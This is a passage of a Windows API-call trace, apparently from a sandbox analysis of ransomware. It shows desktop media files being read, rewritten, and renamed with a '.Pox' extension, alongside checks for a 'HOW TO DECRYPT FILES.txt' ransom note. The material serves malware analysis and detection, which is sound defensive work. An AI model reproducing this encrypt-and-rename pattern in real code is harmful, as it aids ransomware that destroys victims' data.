FILES.txt", lpFilePart=0x0) returned 0x3e [0037.470] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.470] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.471] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.471] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp", lpFilePart=0x0) returned 0x37 [0037.471] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6of3fl3yfrknd.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.472] GetFileType (hFile=0x26c) returned 0x1 [0037.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.472] GetFileType (hFile=0x26c) returned 0x1 [0037.472] WriteFile (in: hFile=0x26c, lpBuffer=0x259e360*, nNumberOfBytesToWrite=0x97b0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x259e360*, lpNumberOfBytesWritten=0x3ae564*=0x97b0, lpOverlapped=0x0) returned 1 [0037.474] CloseHandle (hObject=0x26c) returned 1 [0037.475] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp", lpFilePart=0x0) returned 0x37 [0037.476] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp.Pox", lpFilePart=0x0) returned 0x3b [0037.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.476] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6of3fl3yfrknd.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a974ad0, ftCreationTime.dwHighDateTime=0x1d4cd47, ftLastAccessTime.dwLowDateTime=0xe955410, ftLastAccessTime.dwHighDateTime=0x1d4d30d, ftLastWriteTime.dwLowDateTime=0x28865800, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x97b0)) returned 1 [0037.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.476] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6of3fl3yfrknd.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6oF3FL3YfrkND.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6of3fl3yfrknd.bmp.pox")) returned 1 [0037.477] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg", lpFilePart=0x0) returned 0x2e [0037.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7c9v.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.477] GetFileType (hFile=0x26c) returned 0x1 [0037.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.477] GetFileType (hFile=0x26c) returned 0x1 [0037.477] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xc5cc [0037.484] ReadFile (in: hFile=0x26c, lpBuffer=0x23b92e8, nNumberOfBytesToRead=0xc5cc, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x23b92e8*, lpNumberOfBytesRead=0x3ae570*=0xc5cc, lpOverlapped=0x0) returned 1 [0037.484] CloseHandle (hObject=0x26c) returned 1 [0037.542] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.542] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.542] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg", lpFilePart=0x0) returned 0x2e [0037.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.543] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7c9v.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.544] GetFileType (hFile=0x26c) returned 0x1 [0037.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.544] GetFileType (hFile=0x26c) returned 0x1 [0037.544] WriteFile (in: hFile=0x26c, lpBuffer=0x242b3b0*, nNumberOfBytesToWrite=0xc5d0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x242b3b0*, lpNumberOfBytesWritten=0x3ae564*=0xc5d0, lpOverlapped=0x0) returned 1 [0037.545] CloseHandle (hObject=0x26c) returned 1 [0037.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg", lpFilePart=0x0) returned 0x2e [0037.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg.Pox", lpFilePart=0x0) returned 0x32 [0037.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.547] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7c9v.jpg"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fcea30, ftCreationTime.dwHighDateTime=0x1d4cff5, ftLastAccessTime.dwLowDateTime=0xeb645dd0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0x288fdd80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xc5d0)) returned 1 [0037.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.547] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7c9v.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7C9V.jpg.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7c9v.jpg.pox")) returned 1 [0037.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp", lpFilePart=0x0) returned 0x32 [0037.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enbmmmwk.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.548] GetFileType (hFile=0x26c) returned 0x1 [0037.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.548] GetFileType (hFile=0x26c) returned 0x1 [0037.548] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x134a3 [0037.548] ReadFile (in: hFile=0x26c, lpBuffer=0x2437ed4, nNumberOfBytesToRead=0x134a3, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x2437ed4*, lpNumberOfBytesRead=0x3ae570*=0x134a3, lpOverlapped=0x0) returned 1 [0037.549] CloseHandle (hObject=0x26c) returned 1 [0037.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.566] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp", lpFilePart=0x0) returned 0x32 [0037.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enbmmmwk.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.567] GetFileType (hFile=0x26c) returned 0x1 [0037.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.567] GetFileType (hFile=0x26c) returned 0x1 [0037.567] WriteFile (in: hFile=0x26c, lpBuffer=0x24beae4*, nNumberOfBytesToWrite=0x134b0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24beae4*, lpNumberOfBytesWritten=0x3ae564*=0x134b0, lpOverlapped=0x0) returned 1 [0037.570] CloseHandle (hObject=0x26c) returned 1 [0037.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp", lpFilePart=0x0) returned 0x32 [0037.571] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp.Pox", lpFilePart=0x0) returned 0x36 [0037.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enbmmmwk.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c999730, ftCreationTime.dwHighDateTime=0x1d4ceb8, ftLastAccessTime.dwLowDateTime=0xd07de150, ftLastAccessTime.dwHighDateTime=0x1d4ceda, ftLastWriteTime.dwLowDateTime=0x2894a040, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x134b0)) returned 1 [0037.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.571] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enbmmmwk.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ENBmMMWK.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\enbmmmwk.bmp.pox")) returned 1 [0037.572] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3", lpFilePart=0x0) returned 0x34 [0037.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.572] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gh-zamzajg.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.572] GetFileType (hFile=0x26c) returned 0x1 [0037.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.572] GetFileType (hFile=0x26c) returned 0x1 [0037.572] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x10751 [0037.572] ReadFile (in: hFile=0x26c, lpBuffer=0x24d24b8, nNumberOfBytesToRead=0x10751, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24d24b8*, lpNumberOfBytesRead=0x3ae570*=0x10751, lpOverlapped=0x0) returned 1 [0037.573] CloseHandle (hObject=0x26c) returned 1 [0037.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3", lpFilePart=0x0) returned 0x34 [0037.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gh-zamzajg.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.591] GetFileType (hFile=0x26c) returned 0x1 [0037.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.591] GetFileType (hFile=0x26c) returned 0x1 [0037.591] WriteFile (in: hFile=0x26c, lpBuffer=0x25508d8*, nNumberOfBytesToWrite=0x10760, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x25508d8*, lpNumberOfBytesWritten=0x3ae564*=0x10760, lpOverlapped=0x0) returned 1 [0037.592] CloseHandle (hObject=0x26c) returned 1 [0037.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3", lpFilePart=0x0) returned 0x34 [0037.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3.Pox", lpFilePart=0x0) returned 0x38 [0037.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gh-zamzajg.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4ddbec0, ftCreationTime.dwHighDateTime=0x1d4cc51, ftLastAccessTime.dwLowDateTime=0xf54fa3d0, ftLastAccessTime.dwHighDateTime=0x1d4d33d, ftLastWriteTime.dwLowDateTime=0x289701a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x10760)) returned 1 [0037.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0037.594] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gh-zamzajg.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gH-zamZAJg.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gh-zamzajg.mp3.pox")) returned 1 [0037.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv", lpFilePart=0x0) returned 0x36 [0037.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0037.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m4svx-jegxww.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.594] GetFileType (hFile=0x26c) returned 0x1 [0037.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0037.594] GetFileType (hFile=0x26c) returned 0x1 [0037.595] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x16850 [0037.595] ReadFile (in: hFile=0x26c, lpBuffer=0x3482e50, nNumberOfBytesToRead=0x16850, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x3482e50*, lpNumberOfBytesRead=0x3ae570*=0x16850, lpOverlapped=0x0) returned 1 [0037.597] CloseHandle (hObject=0x26c) returned 1 [0037.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0037.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0037.637] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0037.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv", lpFilePart=0x0) returned 0x36 [0037.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0037.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m4svx-jegxww.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0037.639] GetFileType (hFile=0x26c) returned 0x1 [0037.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0037.639] GetFileType (hFile=0x26c) returned 0x1 [0037.639] WriteFile (in: hFile=0x26c, lpBuffer=0x34f3860*, nNumberOfBytesToWrite=0x16860, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x34f3860*, lpNumberOfBytesWritten=0x3ae564*=0x16860, lpOverlapped=0x0) returned 1 [0037.641] CloseHandle (hObject=0x26c) returned 1 [0037.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv", lpFilePart=0x0) returned 0x36 [0037.643] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv.Pox", lpFilePart=0x0) returned 0x3a [0037.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0037.643] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\m4SvX-jeGXwW.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m4svx-jegxww.mkv"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1ebac40, ftCreationTime.dwHighDateTime=0x1d4c9fe, ftLastAccessTime.dwLowDateTime=0x989a0550, 